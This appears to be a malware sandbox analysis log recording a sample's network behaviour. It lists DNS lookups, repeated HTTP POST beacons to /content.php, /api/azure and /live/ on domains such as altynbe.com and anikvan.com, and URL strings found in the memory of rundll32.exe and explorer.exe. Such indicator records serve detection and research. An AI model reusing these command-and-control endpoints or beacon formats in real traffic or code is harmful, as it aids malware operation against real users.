                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: workspacin.cloudContent-Length: 248Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: workspacin.cloudContent-Length: 180Cache-Control: no-cache
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A4004 InternetReadFile,22_2_013A4004
                      Source: global trafficDNS traffic detected: DNS query: boriz400.com
                      Source: global trafficDNS traffic detected: DNS query: altynbe.com
                      Source: global trafficDNS traffic detected: DNS query: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
                      Source: global trafficDNS traffic detected: DNS query: anikvan.com
                      Source: global trafficDNS traffic detected: DNS query: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                      Source: global trafficDNS traffic detected: DNS query: workspacin.cloud
                      Source: unknownHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:04:29 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:04:54 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:05:03 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:05:21 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: explorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
                      Source: explorer.exe, 00000016.00000000.1859052974.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                      Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/
                      Source: rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/5~
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/=~
                      Source: rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/B_F
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/U~
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/X
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/api/azure
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/api/azureontent.phpMfE
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/api/azurep
                      Source: rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/api/azureure
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/content.php
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/content.php2f
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/d
                      Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/db-53011b87bd06
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/ic
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/tyk.io
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                      Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/
                      Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/I~
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/api/azure
                      Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/api/azure==
                      Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/api/azuret.php.f
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/content.php
                      Source: rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/content.php.f
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/content.phpGf
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/d
                      Source: rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/db-53011b87bd06
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/ic
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                      Source: explorer.exe, 00000016.00000000.1845325737.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2938934418.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                      Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                      Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                      Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
